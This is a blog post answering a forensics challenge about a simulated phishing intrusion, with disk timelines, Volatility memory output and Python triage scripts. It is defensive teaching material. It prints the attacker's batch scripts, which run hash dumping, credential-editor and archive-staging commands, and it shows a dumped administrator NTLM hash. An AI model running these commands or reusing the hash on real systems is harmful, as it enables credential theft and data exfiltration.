Tuesday, December 11, 2012

DFIR Challenge Answers


As promised, here are the answers to my latest DFIR challenge.


1. Who delivered the attack?
   • isd@petro-markets.info

2. Who was the attack delivered to?
   • amirs@petro-market.org
   • callb@petro-market.org
   • wrightd@petro-market.org

3. What time was the attack delivered?
   • Mon, 26 Nov 2012 14:00:08 -0600

4. What time was the attack executed?
   • ENG-USTXHOU Mon Nov 26 2012 23:01:54
   • FLD-SARIYADH Tue Nov 27 2012 00:17:58

5. What is the C2 IP address?
   • 58.64.132.141

6. What is the name of the dropper?
   • Symantec-1.43-1.exe

7. What is the name of the backdoor?
   • 6to4ex.dll

8. What is the process name the backdoor is running in?
   • svchost.exe

9. What is the process id on all the machines the backdoor is installed on?
   • ENG-USTXHOU 1024
   • FLD-SARIYADH 1032

10. What usernames were used in this attack?
   • callb
   • amirs
   • sysbackup

11. What level of access did the attacker have?
   • Local system administrator

12. How was lateral movement performed?
   • Combination of net commands, psexec and .bat scripts

13. What .bat scripts were placed on the machines?
   • system1.bat
   • system2.bat
   • system3.bat
   • system4.bat
   • system5.bat
   • system6.bat

14. What are the contents of each .bat script?

   1.bat
   @echo off
   mkdir c:\windows\webui
   net share z=c:\windows\webui /GRANT:sysbackup,FULL
   ipconfig >> c:\windows\webui\system.dll
   net share >> c:\windows\webui\system.dll
   net start >> c:\windows\webui\system.dll
   net view >> c:\windows\webui\system.dll

   2.bat
   @echo off
   c:\windows\webui\gs.exe -a >> c:\windows\webui\svchost.dll

   3.bat
   @echo off
   dir /S C:\*.dwg > c:\windows\webui\https.dll

   4.bat
   @echo off
   c:\windows\webui\ra.exe a -hphclllsddlsdiddklljh -r c:\windows\webui\netstat.dll "C:\Engineering\Designs\Pumps" -x*.dll

   5.bat
   @echo off
   copy c:\windows\webui\wc.exe c:\windows\system32
   at 04:30 wc.exe -e -o h.out

   6.bat
   @echo off
   ipconfig /all >> c:\windows\webui\system.dll
   net share >> c:\windows\webui\system.dll
   net start >> c:\windows\webui\system.dll
   net view >> c:\windows\webui\system.dll

15. What other tools were placed on the machines by the attacker?
   • gs.exe - gsecdump
   • ps.exe - psexec
   • ra.exe - rar.exe
   • sl.exe - scanline
   • wc.exe - Windows Credentials Editor

16. What directory was used by the attacker to drop tools?
   • c:\windows\webui

17. Was the directory newly created or was it there prior to the attack?
   • Newly created

18. What were the names of the exfiltrated files?
   • pump1.dwg - pump100.dwg

19. What did the exfiltrated files contain?
   • The files contained all 0's

20. What time did WinRAR run?
   • Tue Nov 27 2012 01:11:19

21. What is the md5sum of pump1.dwg?
   • a48266248c04b2ba733238a480690a1c

22. Which machines were compromised and need to be remediated?
   • ENG-USTXHOU-148
   • FLD-SARIYADH-43
   • IIS-SARIYADH-03

23. Which user accounts were compromised and need to be remediated?
   • callb - Used by attacker
   • amirs - Used by attacker
   • sysbackup - Used by attacker
   • saadmin\petro-market.org - Hash seen dumped by gsecdump
   • administrator\current - Hash seen dumped by gsecdump

24. Are there additional machines that need to be analyzed?
   • Yes. The machine of the third phish recipient (wrightd@petro-market.org) needs to be validated to confirm it has not been compromised.

25. Describe how each machine was involved in this incident and overall what happened.
   • See the writeups below.

Wednesday, December 5, 2012

dfir-challenge-IIS-SARIYADH-03

Timeline

PSEXESVC.EXE being created as a result of a remote psexec connection

Tue Nov 27 2012 00:05:48   181064 macb r/rrwxrwxrwx 0        0        10784-128-3 c:/WINDOWS/PSEXESVC.EXE

Modified times would indicate the following tools were copied from a different machine: each file's modification time predates its creation (..cb entries) on this host

Tue Nov 27 2012 00:20:33   303104 m... r/rrwxrwxrwx 0        0        10365-128-3 c:/WINDOWS/webui/gs.exe
Tue Nov 27 2012 00:20:40   403968 m... r/rrwxrwxrwx 0        0        10380-128-3 c:/WINDOWS/webui/ra.exe
Tue Nov 27 2012 00:20:46   208384 m... r/rrwxrwxrwx 0        0        10881-128-3 c:/WINDOWS/webui/wc.exe

Apparent activity would indicate a logon from the sysbackup user (profile directory created)

Tue Nov 27 2012 00:29:06       56 ...b d/drwxrwxrwx 0        0        10008-144-6 c:/Documents and Settings/sysbackup
                               56 m.c. d/drwxrwxrwx 0        0        3389-144-6 c:/Documents and Settings
                               56 .a.. d/dr-xr-xr-x 0        0        3390-144-7 c:/Documents and Settings/Default User
                              360 .a.. d/d--x--x--x 0        0        3411-144-1 c:/Documents and Settings/Default User/Application Data
                              496 .a.. d/drwxrwxrwx 0        0        3412-144-1 c:/Documents and Settings/Default User/Application Data/Microsoft
                              152 .a.. d/drwxrwxrwx 0        0        3475-144-1 c:/Documents and Settings/Default User/Cookies
                               56 .a.. d/d--x--x--x 0        0        3482-144-5 c:/Documents and Settings/Default User/SendTo
                              256 .a.. d/d-wx-wx-wx 0        0        3483-144-1 c:/Documents and Settings/Default User/Start Menu
                              696 .a.. d/d-wx-wx-wx 0        0        3486-144-1 c:/Documents and Settings/Default User/Start Menu/Programs
                              152 .a.. d/d-wx-wx-wx 0        0        3488-144-1 c:/Documents and Settings/Default User/Start Menu/Programs/Startup
                               56 .a.. d/d--x--x--x 0        0        3490-144-6 c:/Documents and Settings/Default User/Local Settings
                              256 .a.. d/dr-xr-xr-x 0        0        3492-144-1 c:/Documents and Settings/Default User/Local Settings/Application Data
                              256 .a.. d/drwxrwxrwx 0        0        3493-144-1 c:/Documents and Settings/Default User/Local Settings/Temporary Internet Files
                              256 .a.. d/drwxrwxrwx 0        0        3494-144-1 c:/Documents and Settings/Default User/Local Settings/History
                               56 .a.. d/d-wx-wx-wx 0        0        6182-144-6 c:/Documents and Settings/Default User/Start Menu/Programs/Accessories
Skipping...

ipconfig is accessed and would appear to have been executed

Tue Nov 27 2012 00:44:15    61440 .a.. r/rrwxrwxrwx 0        0        453-128-3 c:/WINDOWS/system32/ipconfig.exe

system.dll is created

Tue Nov 27 2012 00:44:16     5711 mac. r/rrwxrwxrwx 0        0        10872-128-3 c:/WINDOWS/webui/system.dll

net1.exe is accessed, indicating the net command was run

Tue Nov 27 2012 00:44:16   120320 .a.. r/rrwxrwxrwx 0        0        458-128-3 c:/WINDOWS/system32/net1.exe

gs.exe is copied to the machine (gsecdump)

Tue Nov 27 2012 00:53:49   303104 ..cb r/rrwxrwxrwx 0        0        10365-128-3 c:/WINDOWS/webui/gs.exe

svchost.dll is created

Tue Nov 27 2012 00:55:41     1230 ...b r/rrwxrwxrwx 0        0        10780-128-3 c:/WINDOWS/webui/svchost.dll

gs.exe is run (gsecdump). It would also appear that svchost.dll is being populated with hashes: it is modified at the same moment lsasrv.dll, cryptdll.dll and samsrv.dll are accessed.

Tue Nov 27 2012 00:56:43   303104 .a.. r/rrwxrwxrwx 0        0        10365-128-3 c:/WINDOWS/webui/gs.exe
                             1230 m.c. r/rrwxrwxrwx 0        0        10780-128-3 c:/WINDOWS/webui/svchost.dll
                           799232 .a.. r/rrwxrwxrwx 0        0        307-128-3 c:/WINDOWS/system32/lsasrv.dll
                            34816 .a.. r/rrwxrwxrwx 0        0        308-128-3 c:/WINDOWS/system32/cryptdll.dll
                           462848 .a.. r/rrwxrwxrwx 0        0        310-128-3 c:/WINDOWS/system32/samsrv.dll

svchost.dll is accessed

Tue Nov 27 2012 00:57:20     1230 .a.. r/rrwxrwxrwx 0        0        10780-128-3 c:/WINDOWS/webui/svchost.dll

https.dll is placed on the machine. A large number of directories are accessed at the same time, consistent with a directory scan

Tue Nov 27 2012 01:00:27     5282 ...b r/rrwxrwxrwx 0        0        10875-128-3 c:/WINDOWS/webui/https.dll

ra.exe gets placed on the system

Tue Nov 27 2012 01:05:24   403968 ..cb r/rrwxrwxrwx 0        0        10380-128-3 c:/WINDOWS/webui/ra.exe

WinRAR user profile created for the sysbackup user, indicating WinRAR was executed

Tue Nov 27 2012 01:05:55       48 macb d/drwxrwxrwx 0        0        10877-144-1 c:/Documents and Settings/sysbackup/Application Data/WinRAR

ra.exe is executed; at the same time the .dwg files are accessed and netstat.dll and system4.bat are created

Tue Nov 27 2012 01:11:19   403968 .a.. r/rrwxrwxrwx 0        0        10380-128-3 c:/WINDOWS/webui/ra.exe
                          2048000 .a.. r/rrwxrwxrwx 0        0        10672-128-3 c:/Engineering/Designs/Pumps/pump1.dwg
                          2048000 .a.. r/rrwxrwxrwx 0        0        10681-128-3 c:/Engineering/Designs/Pumps/pump10.dwg
                              131 .a.b r/rrwxrwxrwx 0        0        10876-128-1 c:/WINDOWS/system32/system4.bat
                           109092 ...b r/rrwxrwxrwx 0        0        10878-128-3 c:/WINDOWS/webui/netstat.dll

Note: pump1.dwg - pump100.dwg are accessed in a 21 second time span

system5.bat appears to be run; an At job is created to collect hashes

Tue Nov 27 2012 01:22:08       88 .a.b r/rrwxrwxrwx 0        0        10879-128-1 c:/WINDOWS/system32/system5.bat
                              322 ...b r/rrwxrwxrwx 0        0        10880-128-1 c:/WINDOWS/Tasks/At1.job
                              456 mac. d/drwxrwxrwx 0        0        5639-144-1 c:/WINDOWS/Tasks
                            24576 .a.. r/rrwxrwxrwx 0        0        652-128-3 c:/WINDOWS/system32/at.exe

wc.exe is copied and executed

Tue Nov 27 2012 01:23:36       56 mac. d/drwxrwxrwx 0        0        10871-144-5 c:/WINDOWS/webui
                           208384 .acb r/rrwxrwxrwx 0        0        10881-128-3 c:/WINDOWS/webui/wc.exe
Tue Nov 27 2012 01:30:00      322 mac. r/rrwxrwxrwx 0        0        10880-128-1 c:/WINDOWS/Tasks/At1.job

Response activity detected

Tue Nov 27 2012 01:42:21    95104 m... r/rrwxrwxrwx 0        0        10882-128-3 c:/mdd.exe
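The timeline reasoning above (modification time older than creation time means the file was copied in; a file born under c:/WINDOWS/webui is a tool drop; an access to ipconfig.exe, net1.exe, at.exe or a dropped .exe means it ran) can be mechanised. The following script is an added example, not part of the original writeup; it parses mactime rows, including the undated continuation rows, and applies those three rules to a constructed subset of the rows shown above. The rule set and directory name are assumptions taken from this writeup, not a general tool.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed subset of the mactime output above. Rows without a date share
# the timestamp of the dated row before them (mactime's own output format).
SAMPLE_TIMELINE = """\
Tue Nov 27 2012 00:20:33   303104 m... r/rrwxrwxrwx 0        0        10365-128-3 c:/WINDOWS/webui/gs.exe
Tue Nov 27 2012 00:44:15    61440 .a.. r/rrwxrwxrwx 0        0        453-128-3 c:/WINDOWS/system32/ipconfig.exe
Tue Nov 27 2012 00:44:16     5711 mac. r/rrwxrwxrwx 0        0        10872-128-3 c:/WINDOWS/webui/system.dll
                           120320 .a.. r/rrwxrwxrwx 0        0        458-128-3 c:/WINDOWS/system32/net1.exe
Tue Nov 27 2012 00:53:49   303104 ..cb r/rrwxrwxrwx 0        0        10365-128-3 c:/WINDOWS/webui/gs.exe
Tue Nov 27 2012 00:56:43   303104 .a.. r/rrwxrwxrwx 0        0        10365-128-3 c:/WINDOWS/webui/gs.exe
Tue Nov 27 2012 01:22:08       88 .a.b r/rrwxrwxrwx 0        0        10879-128-1 c:/WINDOWS/system32/system5.bat
                              322 ...b r/rrwxrwxrwx 0        0        10880-128-1 c:/WINDOWS/Tasks/At1.job
                            24576 .a.. r/rrwxrwxrwx 0        0        652-128-3 c:/WINDOWS/system32/at.exe
"""

# One mactime row: optional date, size, MACB flags, mode, uid, gid, meta, name.
LINE_RE = re.compile(
    r"^(?P<date>\w{3} \w{3} \d{1,2} \d{4} \d{2}:\d{2}:\d{2})?\s*"
    r"(?P<size>\d+)\s+(?P<macb>[macb.]{4})\s+(?P<mode>\S+)\s+"
    r"(?P<uid>\d+)\s+(?P<gid>\d+)\s+(?P<meta>\S+)\s+(?P<name>.+?)\s*$"
)

TOOL_DIR = "c:/windows/webui/"   # attacker working directory from this writeup
# Built-in admin binaries whose access time the writeup reads as "command ran".
ADMIN_BINS = {"ipconfig.exe", "net1.exe", "at.exe"}


def parse_mactime(text):
    """Parse mactime rows into dicts; undated rows inherit the previous timestamp."""
    events, current_ts = [], None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        m = LINE_RE.match(raw)
        if not m:
            raise ValueError("unparseable mactime row: %r" % raw)
        if m.group("date"):
            current_ts = datetime.strptime(m.group("date"), "%a %b %d %Y %H:%M:%S")
        elif current_ts is None:
            raise ValueError("continuation row before any dated row")
        events.append({"ts": current_ts, "size": int(m.group("size")),
                       "macb": m.group("macb"), "name": m.group("name")})
    return events


def find_indicators(events):
    """Return (kind, path, 'YYYY-MM-DD HH:MM:SS') findings in time order."""
    # Collect the M/A/C/B timestamps observed for each path.
    stamps = defaultdict(dict)
    for ev in events:
        for flag in ev["macb"]:
            if flag != ".":
                stamps[ev["name"]][flag] = ev["ts"]

    findings = []
    for path, ts in stamps.items():
        lower = path.lower()
        # A file born inside the attacker's working directory is a tool drop.
        if lower.startswith(TOOL_DIR) and "b" in ts:
            findings.append(("tool_drop", path, ts["b"]))
        # NTFS keeps the source's modification time on copy, so a modification
        # time older than the birth time means the file was copied in.
        if "m" in ts and "b" in ts and ts["m"] < ts["b"]:
            findings.append(("copied_from_elsewhere", path, ts["b"]))

    for ev in events:
        if "a" not in ev["macb"]:
            continue
        lower = ev["name"].lower()
        base = lower.rsplit("/", 1)[-1]
        # Access of a built-in admin binary or of a dropped .exe: execution.
        if base in ADMIN_BINS or (lower.startswith(TOOL_DIR) and base.endswith(".exe")):
            findings.append(("exec", ev["name"], ev["ts"]))

    findings.sort(key=lambda f: f[2])  # stable sort keeps insertion order within a second
    return [(k, p, t.strftime("%Y-%m-%d %H:%M:%S")) for k, p, t in findings]


def analyze(text=SAMPLE_TIMELINE):
    return find_indicators(parse_mactime(text))


if __name__ == "__main__":
    for kind, path, when in analyze():
        print("%s  %-22s %s" % (when, kind, path))
```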

                                                    Memory


PSEXESVC.EXE running as a child of services.exe



                                                    vol.py pslist -f memdump.bin --profile=Win2003SP0x86
                                                    Volatile Systems Volatility Framework 2.2
                                                    Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                Exit                
                                                    ---------- -------------------- ------ ------ ------ -------- ------ ------ -------------------- --------------------
                                                    0x822b07a8 System                    4      0     60      434 ------      0                                          
                                                    0x82103020 smss.exe                404      4      3       17 ------      0 2012-11-26 22:04:57                      
                                                    0x820ecd88 csrss.exe               452    404     11      388      0      0 2012-11-26 22:04:58                      
                                                    0x82003d88 winlogon.exe            484    404     17      514      0      0 2012-11-26 22:05:00                      
                                                    0x81ff9b08 services.exe            528    484     16      289      0      0 2012-11-26 22:05:01                      
                                                    0x81ff45c8 lsass.exe               540    484     36      487      0      0 2012-11-26 22:05:01                      
                                                    0x81fe9d88 svchost.exe             768    528     10      184      0      0 2012-11-26 22:05:03                      
                                                    0x81fb9cd8 svchost.exe             848    528      8      126      0      0 2012-11-26 22:05:03                      
                                                    0x81fbc020 svchost.exe             868    528      5       78      0      0 2012-11-26 22:05:03                      
                                                    0x81fb3668 svchost.exe             900    528     45      807      0      0 2012-11-26 22:05:03                      
                                                    0x81f9c498 spoolsv.exe            1084    528      8      103      0      0 2012-11-26 22:05:19                      
                                                    0x81f92020 msdtc.exe              1112    528     19      163      0      0 2012-11-26 22:05:19                      
                                                    0x81f84888 svchost.exe            1260    528      2       52      0      0 2012-11-26 22:05:27                      
                                                    0x81f7ac78 inetinfo.exe           1312    528      8      151      0      0 2012-11-26 22:05:27                      
                                                    0x81f82ad8 svchost.exe            1344    528      2       33      0      0 2012-11-26 22:05:27                      
                                                    0x81f77388 wins.exe               1388    528     19      196      0      0 2012-11-26 22:05:27                      
                                                    0x81c94d88 dfssvc.exe             1608    528      9       70      0      0 2012-11-26 22:05:31                      
                                                    0x81f6a9d0 svchost.exe            1656    528     15      138      0      0 2012-11-26 22:05:31                      
                                                    0x81c39608 explorer.exe           1928   1896      9      277      0      0 2012-11-26 22:05:47                      
                                                    0x81c0c200 svchost.exe             256    528     15      120      0      0 2012-11-26 22:06:05                      
                                                    0x81bff828 wuauclt.exe             860    900      5       69      0      0 2012-11-26 22:06:44                      
                                                    0x81bfc268 wmiprvse.exe           1080    768      4      136      0      0 2012-11-26 22:06:44                      
                                                    0x81f7f2b0 PSEXESVC.EXE            268    528      4       85      0      0 2012-11-27 00:05:49                      
                                                    0x81c3f020 cmd.exe                 756   1928      1       22      0      0 2012-11-27 01:50:29                      
                                                    0x81f8d020 mdd.exe                 508    756      1       25      0      0 2012-11-27 01:52:37

Running the Volatility connscan plugin identifies an additional machine that needs to be looked at


                                                    vol.py connscan -f memdump.bin --profile=Win2003SP0x86
                                                    Volatile Systems Volatility Framework 2.2
                                                    Offset(P)  Local Address             Remote Address            Pid
                                                    ---------- ------------------------- ------------------------- ---
                                                    0x01f19328 172.16.223.47:1113        172.16.150.10:445         988
                                                    0x01f52008 172.16.223.47:1112        172.16.150.10:1025        540
                                                    0x01fbc428 172.16.223.47:139         172.16.150.10:1750        4
                                                    0x01febb10 172.16.223.47:1137        172.16.150.10:135         540
                                                    0x01ff8e70 172.16.223.47:445         172.16.150.20:1235        4
                                                    0x0200b3c8 172.16.223.47:1150        172.16.150.10:135         540
                                                    0x02010cd8 172.16.223.47:42          172.16.150.10:1824        1388
                                                    0x020129c8 172.16.223.47:445         172.16.223.187:1210       4
                                                    0x02369ab8 172.16.223.47:1031        172.16.150.10:42          1388
                                                    0x02383008 172.16.223.47:1160        172.16.150.10:1025        540
                                                    0x02419a10 172.16.223.47:1164        172.16.150.10:445         4
                                                    0x025dbcd0 172.16.223.47:1165        172.16.150.10:139         4
                                                    0x02663920 172.16.223.47:1159        172.16.150.10:135         540
                                                    0x0d9f2920 172.16.223.47:1159        172.16.150.10:135         540
                                                    0x0da0acd0 172.16.223.47:1165        172.16.150.10:139         4
                                                    0x0da619c8 172.16.223.47:445         172.16.223.187:1210       4
                                                    0x0daffcd8 172.16.223.47:42          172.16.150.10:1824        1388
                                                    0x0db1fe70 172.16.223.47:445         172.16.150.20:1235        4
                                                    0x0db38ab8 172.16.223.47:1031        172.16.150.10:42          1388
                                                    0x0dbe8a10 172.16.223.47:1164        172.16.150.10:445         4
                                                    0x0dcd2008 172.16.223.47:1160        172.16.150.10:1025        540
                                                    0x0dd59008 172.16.223.47:1112        172.16.150.10:1025        540
                                                    0x0dde0328 172.16.223.47:1113        172.16.150.10:445         988
                                                    0x0defa3c8 172.16.223.47:1150        172.16.150.10:135         540
                                                    0x0dfa3428 172.16.223.47:139         172.16.150.10:1750        4
                                                    0x0e072b10 172.16.223.47:1137        172.16.150.10:135         540
                                                    0x16f7eab8 172.16.223.47:1031        172.16.150.10:42          1388
                                                    0x16ffb920 172.16.223.47:1159        172.16.150.10:135         540
                                                    0x17163cd0 172.16.223.47:1165        172.16.150.10:139         4
                                                    0x17219a10 172.16.223.47:1164        172.16.150.10:445         4
                                                    0x172f7cd8 172.16.223.47:42          172.16.150.10:1824        1388
                                                    0x17317e70 172.16.223.47:445         172.16.150.20:1235        4
                                                    0x174959c8 172.16.223.47:445         172.16.223.187:1210       4
                                                    0x176ba008 172.16.223.47:1160        172.16.150.10:1025        540
                                                    0x177db3c8 172.16.223.47:1150        172.16.150.10:135         540
                                                    0x1781c428 172.16.223.47:139         172.16.150.10:1750        4
                                                    0x17936328 172.16.223.47:1113        172.16.150.10:445         988
                                                    0x179b3008 172.16.223.47:1112        172.16.150.10:1025        540
                                                    0x17c50b10 172.16.223.47:1137        172.16.150.10:135         540
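To show how the connscan result above leads to the additional host, here is an added example (not part of the original writeup) that parses connscan and pslist output in the layout shown above, deduplicates the carved connection records, separates remote hosts that connected to this machine's SMB ports from the other peers, and flags connection owners whose PID no longer appears in pslist. The samples are constructed subsets of the output above; the classification is my own, not a Volatility feature.

```python
import re
from collections import defaultdict

# Constructed subsets of the connscan and pslist output shown above.
CONNSCAN_OUTPUT = """\
Offset(P)  Local Address             Remote Address            Pid
---------- ------------------------- ------------------------- ---
0x01f19328 172.16.223.47:1113        172.16.150.10:445         988
0x01f52008 172.16.223.47:1112        172.16.150.10:1025        540
0x01fbc428 172.16.223.47:139         172.16.150.10:1750        4
0x01ff8e70 172.16.223.47:445         172.16.150.20:1235        4
0x02010cd8 172.16.223.47:42          172.16.150.10:1824        1388
0x020129c8 172.16.223.47:445         172.16.223.187:1210       4
0x0da619c8 172.16.223.47:445         172.16.223.187:1210       4
0x0dde0328 172.16.223.47:1113        172.16.150.10:445         988
"""

PSLIST_OUTPUT = """\
Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                Exit
---------- -------------------- ------ ------ ------ -------- ------ ------ -------------------- --------------------
0x822b07a8 System                    4      0     60      434 ------      0
0x81ff45c8 lsass.exe               540    484     36      487      0      0 2012-11-26 22:05:01
0x81f77388 wins.exe               1388    528     19      196      0      0 2012-11-26 22:05:27
0x81f7f2b0 PSEXESVC.EXE            268    528      4       85      0      0 2012-11-27 00:05:49
"""

CONN_RE = re.compile(r"^0x[0-9a-fA-F]+\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\d+)$")
PS_RE = re.compile(r"^0x[0-9a-fA-F]+\s+(\S+)\s+(\d+)\s+(\d+)")
SMB_PORTS = {139, 445}


def parse_connscan(text):
    """Unique (local_ip, local_port, remote_ip, remote_port, pid) tuples.

    connscan carves connection objects out of physical memory, so the same
    connection (possibly one that has already closed) can appear at several
    offsets; collecting into a set removes those duplicates."""
    conns = set()
    for line in text.splitlines():
        m = CONN_RE.match(line.strip())
        if m:
            lip, lport, rip, rport, pid = m.groups()
            conns.add((lip, int(lport), rip, int(rport), int(pid)))
    return conns


def parse_pslist(text):
    """Map PID -> process name from pslist output."""
    procs = {}
    for line in text.splitlines():
        m = PS_RE.match(line.strip())
        if m:
            procs[int(m.group(2))] = m.group(1)
    return procs


def triage_connections(conns, procs):
    """Group peers: hosts that reached our SMB service (local port 139/445)
    versus everything else, plus PIDs that are no longer in the process list."""
    inbound_smb = defaultdict(set)
    other = defaultdict(set)
    missing_pids = set()
    for lip, lport, rip, rport, pid in conns:
        if lport in SMB_PORTS:
            inbound_smb[rip].add(rport)   # remote host opened a session to us
        else:
            other[rip].add((rport, procs.get(pid, "<not in pslist>")))
        if pid not in procs:
            missing_pids.add(pid)         # owner exited; record was carved
    return {"inbound_smb": dict(inbound_smb),
            "other": dict(other),
            "pids_not_in_pslist": missing_pids}


def run(connscan=CONNSCAN_OUTPUT, pslist=PSLIST_OUTPUT):
    return triage_connections(parse_connscan(connscan), parse_pslist(pslist))


if __name__ == "__main__":
    result = run()
    for host, ports in sorted(result["inbound_smb"].items()):
        print("inbound SMB session from %s (remote ports %s)" % (host, sorted(ports)))
    print("connection owners missing from pslist:", sorted(result["pids_not_in_pslist"]))
```

Every host in the inbound SMB list is a candidate source of the psexec session and should be pulled into scope, which is how 172.16.223.187 surfaces here.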

This authentication record (NTLM, from memory strings) would appear to tie the IP above (172.16.223.187) to the sysbackup user. It also identifies an additional hostname, FLD-SARIYADH-43.

                                                    0000370: fc1c f003 0000 7300 7900 7300 6200 6100  ......s.y.s.b.a.
                                                    0000380: 6300 6b00 7500 7000 0000 4900 4900 5300  c.k.u.p...I.I.S.
                                                    0000390: 2d00 5300 4100 5200 4900 5900 4100 4400  -.S.A.R.I.Y.A.D.
                                                    00003a0: 4800 2d00 3000 3300 0000 2800 3000 7800  H.-.0.3...(.0.x.
                                                    00003b0: 3000 2c00 3000 7800 3500 3700 3200 3500  0.,.0.x.5.7.2.5.
                                                    00003c0: 3700 3300 2900 0000 3300 0000 4e00 7400  7.3.)...3...N.t.
                                                    00003d0: 4c00 6d00 5300 7300 7000 2000 0000 4e00  L.m.S.s.p. ...N.
                                                    00003e0: 5400 4c00 4d00 0000 4600 4c00 4400 2d00  T.L.M...F.L.D.-.
                                                    00003f0: 5300 4100 5200 4900 5900 4100 4400 4800  S.A.R.I.Y.A.D.H.
                                                    0000400: 2d00 3400 3300 0000 2d00 0000 2d00 0000  -.4.3...-...-...
                                                    0000410: 2d00 0000 2d00 0000 2d00 0000 2d00 0000  -...-...-...-...
                                                    0000420: 3100 3700 3200 2e00 3100 3600 2e00 3200  1.7.2...1.6...2.
                                                    0000430: 3200 3300 2e00 3100 3800 3700 0000 3000  2.3...1.8.7...0.


psexec being run from FLD-SARIYADH-43


                                                    515426928 psexec-FLD-SARIYADH-43-1600
                                                    516449152 psexec-FLD-SARIYADH-43-664
                                                    516576728 psexec-FLD-SARIYADH-43-420
                                                    523216208 psexec-FLD-SARIYADH-43-1020

Attacker tool drop directory being shared with full permissions for the sysbackup user

                                                    482666851 net share z=c:\windows\webui /GRANT:sysbackup,FULL

RAR command that creates an archive named netstat.dll from the contents of the Pumps directory (-r recurses into subdirectories, -x*.dll excludes all .dll files) and encrypts it with the password hclllsddlsdiddklljh (-hp encrypts the file headers as well as the data)

                                                    485343532 c:\windows\webui\ra.exe a -hphclllsddlsdiddklljh -r c:\windows\webui\netstat.dll "C:\Engineering\Designs\Pumps" -x*.dll



Using foremost to attempt to recover the RAR archive from memory was partially successful.


                                                    unrar e 00071528.rar 

                                                    UNRAR 4.20 beta 3 freeware      Copyright (c) 1993-2012 Alexander Roshal

                                                    Enter password (will not be echoed) for 00071528.rar: 


                                                    Extracting from 00071528.rar

                                                    Extracting  pump1.dwg                                                 OK 
                                                    Extracting  pump10.dwg                                                OK 
                                                    Extracting  pump100.dwg                                               OK 
                                                    Extracting  pump11.dwg                                                 0%
                                                    CRC failed in the encrypted file Engineering/Designs/Pumps/pump11.dwg. Corrupt file or wrong password.
                                                    CRC failed in the encrypted file 00071528.rar. Corrupt file or wrong password.
                                                    Total errors: 2

                                                    Scheduled task to capture password hashes


                                                    531785668 C:\WINDOWS\Tasks\At1.job
                                                     531785732 wc.exe -e -o h.out
                                                     531785784 At 4:30 AM oPETRO-MARKET

                                                    Scheduled task failed to run


                                                    62817098 "At1.job" (wc.exe) 11/27/2012 4:30:00 AM ** ERROR **
                                                      62817206 Unable to start task.
                                                      62817254 The specific error is:

                                                    Local administrator hash found in memory

                                                    Administrator(current):500:b7ae6225a35c376da8d03b0a558fdf1f:159cb99e6dfd8830d25e8592c505d4be:::


                                                    dfir-challenge-ENG-USTXHOU-148


                                                    Timeline


                                                    Phish delivered to user.  Taken from memory strings.
                                                    Date: Mon, 26 Nov 2012 14:59:38 -0500

                                                     The creation of the prefetch file indicates that the dropper for the backdoor was executed.
                                                    Mon Nov 26 2012 23:01:54 22428 macb r/rrwxrwxrwx 0        0        11722-128-4 c:/WINDOWS/Prefetch/SYMANTEC-1.43-1[2].EXE-3793B625.pf

                                                    At the same time 6to4ex.dll was executed
                                                    100895 .ac. r/rr-xr-xr-x       0         0        8610-128-4 c:/WINDOWS/system32/6to4ex.dll

                                                    Initial beacon identified
                                                    Mon Nov 26 2012 23:01:58

                                                    New directory created to place tools
                                                    Mon Nov 26 2012 23:03:10       56 ...b d/drwxrwxrwx 0     0     7556-144-5 c:/WINDOWS/webui

                                                     ipconfig is run
                                                    Mon Nov 26 2012 23:03:21    26602 ...b r/rrwxrwxrwx 0     0     11706-128-4 c:/WINDOWS/Prefetch/IPCONFIG.EXE-2395F30B.pf
                                                                                                     55808 .a.. r/rrwxrwxrwx 0     0     24145-128-3 c:/WINDOWS/system32/ipconfig.exe

                                                     Obvious tool drop, based on executables being created in the newly created directory.
                                                    Mon Nov 26 2012 23:06:34   381816 ...b r/rrwxrwxrwx 0        0        11710-128-3 c:/WINDOWS/ps.exe
                                                    Mon Nov 26 2012 23:06:35   381816 m.c. r/rrwxrwxrwx 0        0        11710-128-3 c:/WINDOWS/ps.exe
                                                    Mon Nov 26 2012 23:06:47   303104 ...b r/rrwxrwxrwx 0        0        11719-128-3 c:/WINDOWS/webui/gs.exe
                                                    Mon Nov 26 2012 23:06:48   303104 mac. r/rrwxrwxrwx 0        0        11719-128-3 c:/WINDOWS/webui/gs.exe
                                                    Mon Nov 26 2012 23:06:52   403968 macb r/rrwxrwxrwx 0        0        11723-128-3 c:/WINDOWS/webui/ra.exe
                                                    Mon Nov 26 2012 23:06:56    20480 macb r/rrwxrwxrwx 0        0        11724-128-3 c:/WINDOWS/webui/sl.exe
                                                    Mon Nov 26 2012 23:06:59   208384 m.cb r/rrwxrwxrwx 0        0        11725-128-3 c:/WINDOWS/webui/wc.exe

                                                    wc.exe is also placed in the c:\windows\system32 directory
                                                    Mon Nov 26 2012 23:06:59   208384 m... r/rrwxrwxrwx 0        0        11739-128-3 c:/WINDOWS/system32/wc.exe

                                                     ipconfig is run a second time
                                                    Mon Nov 26 2012 23:07:31  26602 mac. r/rrwxrwxrwx 0    0    11706-128-4 c:/WINDOWS/Prefetch/IPCONFIG.EXE-2395F30B.pf

                                                     netuse.dll is born on the filesystem in our tool drop directory at the same time ipconfig is run
                                                    Mon Nov 26 2012 23:07:31      11844 ...b r/rrwxrwxrwx 0        0        11726-128-3 c:/WINDOWS/webui/netuse.dll

                                                    net.exe is executed
                                                    Mon Nov 26 2012 23:07:53    14394 ...b r/rrwxrwxrwx 0        0        11727-128-4 c:/WINDOWS/Prefetch/NET.EXE-01A53C2F.pf

                                                     sl.exe looks like it was executed twice, based on the MAC times of the prefetch file
                                                    Mon Nov 26 2012 23:10:35     6768 ...b r/rrwxrwxrwx 0        0        11729-128-4 c:/WINDOWS/Prefetch/SL.EXE-010E2A23.pf
                                                    Mon Nov 26 2012 23:11:33     6768 mac. r/rrwxrwxrwx 0        0        11729-128-4 c:/WINDOWS/Prefetch/SL.EXE-010E2A23.pf

                                                     netuse.dll is accessed and modified, gs.exe is executed, and samsrv.dll is accessed at the same time.  This makes me highly suspicious of hash dumping, as samsrv.dll handles local security accounts among other things.  Note: the order in which these entries are listed does not necessarily reflect the order in which they were executed.
                                                    Mon Nov 26 2012 23:11:58    11844 mac. r/rrwxrwxrwx 0        0        11726-128-3 c:/WINDOWS/webui/netuse.dll
